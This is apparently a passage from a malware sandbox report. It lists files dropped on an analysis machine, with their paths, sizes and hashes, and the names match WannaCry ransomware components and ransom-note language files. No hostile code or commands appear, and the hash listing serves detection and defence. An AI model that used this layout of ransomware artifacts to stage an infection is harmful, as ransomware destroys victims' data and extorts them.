
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\e9dbd58a-2b15-45c9-8d85-d48f6e32c41a.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
edb743680d63b4f9a909e5d3a1a2af9f

SHA1
c17ed9e1560ce2675092cad9e49ef7b3e753b05e

SHA256
143cc0407341a53020ef1de3c6a91a5f6435b245b6833dd9761a1a4319aeb4f5

SHA512
bbd647a472fbf45436fa1bb6281f6935424f690b28143fcd22314740fcb11bbf818c80ed21f5ade2d383198981d795643b5c138ce7d47661bbdad98ccb6787d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
52ce7466a682e489f7890746d6847514

SHA1
2de31758348c02b0b618d0b94b1508067d311001

SHA256
a36d639a8553e942a9a1ecba9b62a2a470713bdbe0adc9a99636ef496f074280

SHA512
83dc8fe156fb5a6f398b342348fc2954c733820c814878cbd163eb410731c86196ccba068886ca0265621f802f826ce28c63eb2664e689f937d7ff30e65c004d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
8f8ef2d5eb29bfc882a064c6f96b9d71

SHA1
f9954315f27370d08effc7117b9972181807aece

SHA256
23baf023fe6da9c8a542e31a3af7aa91fbc94fb3d1fcfda2d550b2c381e11b74

SHA512
c795de39793a93414f3231571e4b3b05b561422df3ff1e62fc897a4ad46aaa6e4fd82f24693d9b141035bf5fb707cfa4922b284f49fa12ecad8e10678bdecb4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
352376bce2540982f36748564302ee38

SHA1
429e93831275df3934d8bb5cd000e5eee7bf0eed

SHA256
9d73894c0e1689a8e2f6f1577cd976410baede8283aa548029f33f203798c03e

SHA512
9362413358858bdb2f5eb16190ad21bb21218eafa59b94cd8dec648e45e2d39b435d94959922c33d76a38780c9a81010e361b4e308188b36c7377226fbee770f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
862dab12fe2ca99fdb3ef29df336206f

SHA1
b1bb75da247b9710823223dbe5b6573fe1d021de

SHA256
7dfc8f892a4dbc280f1f4f132af186110d67db260b8e89f22b8cd397dc18fca4

SHA512
2346d0127419fc99f3c603539564d4793e10dfd5cd68ec46def98d8f626456abe036dc3d04f34ba163d285d7a4866b8fb7de9ac24a935da86c134934647f3955

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
354cdeebde5bb5fe3e94c26305410082

SHA1
fa5a69bcdc937dc2353f505866a62e283f2cd248

SHA256
355581ec0c3decd59e4ac20b5eb38227ae455af36e34fbcbb2ff17df943f1477

SHA512
8c69acd5c15b4c4ed8d41b0e1fdd790bcc4cf4e87988ec7b17d5d6fc2ed09fca003f86d18c30aaa913669e99642d3e23c0b2a1c602be75dace000ce29a60ea5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
8f314c207bcecf65bb0e68880a5a6b88

SHA1
e463f9de072633492e823c53dd7a5a55bf366c09

SHA256
0c8b5a92178100f9744f3274ae6e4e852e3ea1556e3690b683486d1278dcb309

SHA512
c56811024d923ec89fd8b7cac1ed918dfe82ef681eaf7dd0e4891a05f1f05a87225c61753706d052a3d520bc05da6e149d7c18e9f64a192980cb0a4f6f0bc592

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
e9aa12ff0be6d995ed86f8cf88678158

SHA1
e5ee38fc2ebef0fcbc3059dee29b39f7daf21931

SHA256
f35cd8ef03ac924a59943c5dfffc31ab67a8b5aff272e9f47ff776aabc7ee561

SHA512
95a67acd2a4784b87d73910c1f1f590937c9d9b901e98448556a37eb8137ae5f458f1c673d65a46cf7d6b90bee5fe6b102ce3eeac9e819062cd9c5c2418bcbfc

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SettingsCache.txt

Filesize
846KB

MD5
766f5efd9efca73b6dfd0fb3d648639f

SHA1
71928a29c3affb9715d92542ef4cf3472e7931fe

SHA256
9111e9a5093f97e15510bf3d3dc36fd4a736981215f79540454ce86893993fdc

SHA512
1d4bb423d9cc9037f6974a389ff304e5b9fbd4bfd013a09d4ceeff3fd2a87ad81fe84b2ee880023984978391daf11540f353d391f35a4236b241ccced13a3434

Download Submit
C:\Users\Admin\AppData\Local\Temp\7436.tmp\7437.tmp\7438.bat

Filesize
17KB

MD5
190e7cfa7d6de532ba4498ca3d38b47d

SHA1
7d4ea5ce61962c0445d955a44dd31226fa8c736e

SHA256
faee2b0ac2218435a6973b87277b29010c988efefdcd7fe0e107808c2cc0f282

SHA512
5a87b4bac67957acbc6dfab08cf9b3e1110e4b496b66110a44f7b2d0ec75b950d7569b6220c4a5ab3597db032e70b16d5a5e6ee4ab23102f6d12fea7bdc11598

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe

Filesize
1.5MB

MD5
b60e214eaa44ff19503fbd4f5317a1ed

SHA1
14020df6fa74797607db5ca081a232c8c21cf6f2

SHA256
7c8da07bc7da089402739b2c1d006ba6373fefea38e557328a134be65ead9b2c

SHA512
06dba6c725a21a274603243366688fb5f868d3f80f069c41acdbe384b70485af29a1df1ea97801163392f60a2e90f46c91961e35a829f63665f0ad38baaa03c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd

Filesize
197B

MD5
c7f2bc79dba9b078638f4692947066b0

SHA1
a42bea02d22367788cb2dc77f68ea754c244a50c

SHA256
7be75820d337a48c320e260fb71f40a5a0cbfa5c8c225bec5ff23c1cc15566f7

SHA512
33f2a1c3708d4b3b353122105931ddb34dc4be146ffa73b24dee1eaaeb60f0eed2c3bbf4ad84d648f6408c8b9e0cbbbc421864514c1e057b0cea2c12b2c5d296

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-certs.tmp

Filesize
18KB

MD5
6dbf6cba3344efd0982248d1f19d8a2a

SHA1
e94fe2574f60231d0d0d7dbc519f341663e1d8e5

SHA256
5d087923f2243a9894def74878f7b1b03681ccb357260b60fb30a38718b53fa4

SHA512
4c46b0f2face86ed2641d0cc1fd5371282a751f6e28eebdad4d5e982b342e93d167e035ad17f8c31aad20699a7ee1a4294df0fbdf425c8ccf8af8f2acccf455b

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
18.6MB

MD5
09cc6f9bb2077898dcaf5e8c418b2778

SHA1
dfb2d75a8ef4c27aa6cedd4d2b509262ed1db542

SHA256
2843966bb3facbd5fe911ae8430b8c7b7f6f65664c91a045e92fc3b3535563d4

SHA512
b1fb4bd925e8fbf498bdfd3a286724c4b22d123c441d7a8a2b3469e311f2c6a2b640bd1f7fff2460d0141124c2a7579d93ee122e6aa1a8f269ac5640d57e0489

Download Submit
C:\Users\Admin\Desktop\45421715382876.bat

Filesize
318B

MD5
b741d0951bc2d29318d75208913ea377

SHA1
a13de54ccfbd4ea29d9f78b86615b028bd50d0a5

SHA256
595dc1b7a6f1d7933c2d142d773e445dbc7b1a2089243b51193bc7f730b1c8df

SHA512
bf7b44ba7f0cfe093b24f26b288b715c0f0910fa7dc5f318edfc5c4fdc8c9b8a3b6ced5b61672ecfa9820ffd054b5bc2650ae0812804d2b3fc901aa06dd3ca14

Download Submit
C:\Users\Admin\Desktop\@[email protected]

Filesize
933B

MD5
7e6b6da7c61fcb66f3f30166871def5b

SHA1
00f699cf9bbc0308f6e101283eca15a7c566d4f9

SHA256
4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e

SHA512
e5a56137f325904e0c7de1d0df38745f733652214f0cdb6ef173fa0743a334f95bed274df79469e270c9208e6bdc2e6251ef0cdd81af20fa1897929663e2c7d3

Download Submit
C:\Users\Admin\Desktop\Advertencia.vbs

Filesize
4B

MD5
08121ea7e3b2eb7edfc85252b937aaeb

SHA1
5abc6edb78ab6944e8fee42445eef7ff6c729fd0

SHA256
31cd4463ecc62dc846dbaee0a5446d4bf11100beff1b01ae88e234b6c29329c2

SHA512
a472cb645d2071117b5a10b091d148b9a625ece43c65c2d4bf028b41e88366e45ca25020303dd8d665ccb12e7a7f389966537f335b326b18287f2ac022036a18

Download Submit
C:\Users\Admin\Desktop\Informacion.vbs

Filesize
69B

MD5
72946942abf5cf295f726b816c531ebf

SHA1
8ac5ccae8003c3776c2e0ee0959a76c8bc913495

SHA256
d9fc0446467e00e640f0dd0bf36882943a6993dcc1038ba8f73239152896eb25

SHA512
2f42b10e2c1359a690e1a69e307008e3beb4712e4c071d916fb1380c61cb2ed3ae48c86af44c6f1c9d613e85dd75d8cfd66fd01de0649444ee6d5193d9789d23

Download Submit
C:\Users\Admin\Desktop\Informacion.vbs

Filesize
138B

MD5
fdac6c0d6442c0cfe7c0b69e80227f0a

SHA1
d0d9aea2bf7a4bf1b45237e2207d37830a578d8c

SHA256
b759fa635b2bbce2570feea401c7d2a9735844d204f5bcdbc88f3a3a761f3959

SHA512
7e5dc4b0876173f05f69f523d50ad573f5dfced10a771d1b28315c2a068b6f6c39ae5edd2433223f79e7d32b9180801746c9621de02cba026f93412b83339da4

Download Submit
C:\Users\Admin\Desktop\Informacion.vbs

Filesize
207B

MD5
d3715d7f77349116a701484780269375

SHA1
589c48410637ac33431569b867070a51c4de5b1c

SHA256
ea0bdd86d283aba33d619aeecb5087ad9132b58e8ae7121e3c3774504abb976a

SHA512
9526a79ac4f9a18104f8e84d684136eef9b6bbccfe772d1d1030d9be02de2f7221cdee248ec748971551a42ed1d8fb1c8a9d820b837164f68376cdee1dc8ff3a

Download Submit
C:\Users\Admin\Desktop\Informacion.vbs

Filesize
276B

MD5
089381a847f01ba0962ae00f0d92d5e8

SHA1
9f3240f89871639778a318e0cadccafcf9d7c55e

SHA256
2cda289b5067c9daf8b4dffdf323b2fe9d0a47bfdbb91b4a017029bc74729c05

SHA512
89fbf1b423f17101970290b070d740b8d58beecc6723e64edb7ae23b9285afe3a612b8e8f5ec202d60aca3875a28dbc556a43af9fe4113ac0bdba1fa83c5213a

Download Submit
C:\Users\Admin\Desktop\Informacion.vbs

Filesize
345B

MD5
baa511e0932e6c0781dd1488615d17a6

SHA1
e3218aefe8c272ade02eb6cc5188df6d50b04de0

SHA256
20fa853d5be5b8f30eeb6ae3e24558a2091d80102944ab26b9861df5cea6c6fa

SHA512
24be7fabda63dd82dfb5307e2ae0dc7176bf59c0918f1316bddb7515e0695b10cd6e24420af4afcda3d5f1b01e3d540a2d75a629f40c381da05eb3c28ff4697e

Download Submit
C:\Users\Admin\Desktop\Informacion.vbs

Filesize
414B

MD5
873781e160d6c7a2c7100536f95e373a

SHA1
439389553b0f4b61327c0160a92e4c8ddca8f84d

SHA256
e244905c9acc529b7d7dbd58453f44dbd3f3d627bba23adcf375afde9b6b2a35

SHA512
1116b365d1e44dbad9fcdf462bb3467dbe3ab8b40a01c7dc6d516b24d2b1260c405cbda80f7a1177f89412a2db726a68e6ae2ceee839c117061ecbb75a06a4aa

Download Submit
C:\Users\Admin\Desktop\Informacion.vbs

Filesize
1KB

MD5
a3ced75b9579d86a6aba988c5b9f1366

SHA1
3baa4455567bab50bd9dbadcf1190b0084b34ba5

SHA256
3162796945f12393fb52c7b073b93f2d0911c623a75015265eca05cfbe769184

SHA512
69e59ce7055411254c9f9917c69bbb3dfa94ee8b00c25789bec40ad04fe4627c567a3d66b8c6753ccf1d9ac0048828459d47caca65f01221d485f4766380998c

Download Submit
C:\Users\Admin\Desktop\Informacion.vbs

Filesize
1KB

MD5
7567cf187fe91ee159764b88d6f607ab

SHA1
c2052c801e07fdbea4acd00631a43019f625a448

SHA256
a1cedb0e74d972b8d71fcfa79ecfd7d53d32f037c1b0ed6138514b66db4585d9

SHA512
e7ee608c48af33f7d7ed01d2e9a248d3e5c84a4e83846d94c0305aa94e26633c2f1d38b99fb66bd469c0c8bbaa8b1329d2dc54e103d3e7be482ec2ae5873a847

Download Submit
C:\Users\Admin\Desktop\Informacion.vbs

Filesize
2KB

MD5
2a123e84f1ee1718e965d878b5e98b45

SHA1
55d75b072501076d13b6935ad956a4722ac0cbcf

SHA256
3c323c6625607fd67f9d67e0640c56345fc69a8c17007751f202bb38af18fb04

SHA512
854f6640a72b57cd447a6df02e6a3a31bd44963ac656ac1e4fc28d288de77c4bdf4df42641598afb538f7a99e570509b227ea5069fd0d786b478c2eca893b982

Download Submit
C:\Users\Admin\Desktop\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Desktop\Taskdl.bat

Filesize
346B

MD5
4e71aaa85b945ab5dc2680ce12d8474f

SHA1
a00ff196706e8282b02187281a7fa71f20c59eba

SHA256
411d8fc3a482880ec2b56a7193a4104130ca9554f1feb96db27c59a2b61303a5

SHA512
cea3cdb3eb537454ccf9773c80c111d8172dace2c79c62ffe18ac7c4373669d055fd9cc4929f9b6f4f376507a1319e37b0ba26373e40f4332d1acb025792b430

Download Submit
C:\Users\Admin\Desktop\Taskdl.bat

Filesize
692B

MD5
6989502044e4a9fca67e9ded25de9956

SHA1
9a8d099caad939d32599530b27f7db641cbdb8da

SHA256
b370b54e95376f4b6df27592bc23343c82ebbfad3d52e71a38a2aac504bda04c

SHA512
9f0e6d59d9adc531f5c162b964205e0dd63c6a956291af48d24e6b8988a940b6f2cc7644a9163277e6383a6d9f8ddb00c9687d73426ea776c691e73f66e95a5e

Download Submit
C:\Users\Admin\Desktop\Taskdl.bat

Filesize
2KB

MD5
66ec111f240b3084f33b88bb859dfc8a

SHA1
6aa898c545f77bc9dc2e2e1aac25ccc6673f3932

SHA256
ae84fbbec53115c94da4fedf903ed3ad351efa84952fb4281122e6d047f88fa4

SHA512
ca258203bc8ebbe12cd8bad72a5052c856af1dd5441309b0713393b3f166ea679446af3839df0739d5f8c4ffa805ebe4bb57e6e7a0a063dbb62b0eeff5cfcf17

Download Submit
C:\Users\Admin\Desktop\Taskdl.bat

Filesize
4KB

MD5
86b897b6a7b671440e67e0dbb7124248

SHA1
7b16e207b59156b24192b9466834c7d90c46c833

SHA256
481cccee9b8e011590fa44678e608c38c51bb9177b0a5a4c7305c591fe368d1a

SHA512
f99a27edafe0dae66f59d3148188827cffda453bc2f3449e73fa7ceb03d68e6a902f070c0f80350f0b837b463017989f10fed1c27dd3458a2c3ba64e935359d6

Download Submit
C:\Users\Admin\Desktop\Twain_20.cmd

Filesize
11B

MD5
9905e5a33c6edd8eb5f59780afbf74de

SHA1
64b2cd0186ff6fe05072ee88e2bb54476023772e

SHA256
c134b2f85415ba5cfce3e3fe4745688335745a9bb22152ac8f5c77f190d8aee3

SHA512
e10711d0fb09db27192e9af05ae45b83cf3882d98e904a7f1f969cf24c2f9626f70f35d76f57477fe9c64a58bc74100410740e9d506d4e72d3e2900d6277816e

Download Submit
C:\Users\Admin\Desktop\Twain_20.cmd

Filesize
158B

MD5
ad0010095a82da61b486dbe70cd90767

SHA1
67d5a65f8cee8409dfcec2da99d290a2730cd662

SHA256
28d651bd0e01d8ee66b46b064b05841cf33e44f3c55ee8b0612f5a812bf0de43

SHA512
93a5f5c2f71a00ce760f1efe89280e259b3f75f1d04e3a1708d683c0b9a619fb5ac577e0d9f59c3b767c3b45323e3af9450362624526705766bf77a94b4aa827

Download Submit
C:\Users\Admin\Desktop\Twain_20.dll

Filesize
106KB

MD5
8b6a377f9a67d5482a8eba5708f45bb2

SHA1
7197436525e568606850ee5e033c43aea1c3bc91

SHA256
6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f

SHA512
644e51798399168530b05e629b414dd80cac678bd3c8d4a5d164f55736a2b2fd380d3ca4640f7a034c8f043c06b1527b473e2d17da088d5e97de6ea04120dd72

Download Submit
C:\Users\Admin\Desktop\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\Desktop\c.wnry

Filesize
780B

MD5
93f33b83f1f263e2419006d6026e7bc1

SHA1
1a4b36c56430a56af2e0ecabd754bf00067ce488

SHA256
ef0ed0b717d1b956eb6c42ba1f4fd2283cf7c8416bed0afd1e8805ee0502f2b4

SHA512
45bdd1a9a3118ee4d3469ee65a7a8fdb0f9315ca417821db058028ffb0ed145209f975232a9e64aba1c02b9664c854232221eb041d09231c330ae510f638afac

Download Submit
C:\Users\Admin\Desktop\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\Desktop\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\Desktop\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\Desktop\msg\m_croatian.wnry

Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\Desktop\msg\m_czech.wnry

Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\Desktop\msg\m_danish.wnry

Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\Desktop\msg\m_dutch.wnry

Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\Desktop\msg\m_english.wnry

Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\Desktop\msg\m_filipino.wnry

Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\Desktop\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\Desktop\msg\m_french.wnry

Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\Desktop\msg\m_german.wnry

Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\Desktop\msg\m_greek.wnry

Filesize
47KB

MD5
fb4e8718fea95bb7479727fde80cb424

SHA1
1088c7653cba385fe994e9ae34a6595898f20aeb

SHA256
e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

SHA512
24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

Download Submit
C:\Users\Admin\Desktop\msg\m_indonesian.wnry

Filesize
36KB

MD5
3788f91c694dfc48e12417ce93356b0f

SHA1
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

SHA256
23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

SHA512
b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

Download Submit
C:\Users\Admin\Desktop\msg\m_italian.wnry

Filesize
36KB

MD5
30a200f78498990095b36f574b6e8690

SHA1
c4b1b3c087bd12b063e98bca464cd05f3f7b7882

SHA256
49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

SHA512
c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

Download Submit
C:\Users\Admin\Desktop\msg\m_japanese.wnry

Filesize
79KB

MD5
b77e1221f7ecd0b5d696cb66cda1609e

SHA1
51eb7a254a33d05edf188ded653005dc82de8a46

SHA256
7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

SHA512
f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

Download Submit
C:\Users\Admin\Desktop\msg\m_korean.wnry

Filesize
89KB

MD5
6735cb43fe44832b061eeb3f5956b099

SHA1
d636daf64d524f81367ea92fdafa3726c909bee1

SHA256
552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

SHA512
60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

Download Submit
C:\Users\Admin\Desktop\msg\m_latvian.wnry

Filesize
40KB

MD5
c33afb4ecc04ee1bcc6975bea49abe40

SHA1
fbea4f170507cde02b839527ef50b7ec74b4821f

SHA256
a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

SHA512
0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

Download Submit
C:\Users\Admin\Desktop\msg\m_norwegian.wnry

Filesize
36KB

MD5
ff70cc7c00951084175d12128ce02399

SHA1
75ad3b1ad4fb14813882d88e952208c648f1fd18

SHA256
cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

SHA512
f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

Download Submit
C:\Users\Admin\Desktop\msg\m_polish.wnry

Filesize
38KB

MD5
e79d7f2833a9c2e2553c7fe04a1b63f4

SHA1
3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

SHA256
519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

SHA512
e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

Download Submit
C:\Users\Admin\Desktop\msg\m_portuguese.wnry

Filesize
37KB

MD5
fa948f7d8dfb21ceddd6794f2d56b44f

SHA1
ca915fbe020caa88dd776d89632d7866f660fc7a

SHA256
bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

SHA512
0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

Download Submit
C:\Users\Admin\Desktop\msg\m_romanian.wnry

Filesize
50KB

MD5
313e0ececd24f4fa1504118a11bc7986

SHA1
e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

SHA256
70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

SHA512
c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

Download Submit
C:\Users\Admin\Desktop\msg\m_russian.wnry

Filesize
46KB

MD5
452615db2336d60af7e2057481e4cab5

SHA1
442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

SHA256
02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

SHA512
7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

Download Submit
C:\Users\Admin\Desktop\msg\m_slovak.wnry

Filesize
40KB

MD5
c911aba4ab1da6c28cf86338ab2ab6cc

SHA1
fee0fd58b8efe76077620d8abc7500dbfef7c5b0

SHA256
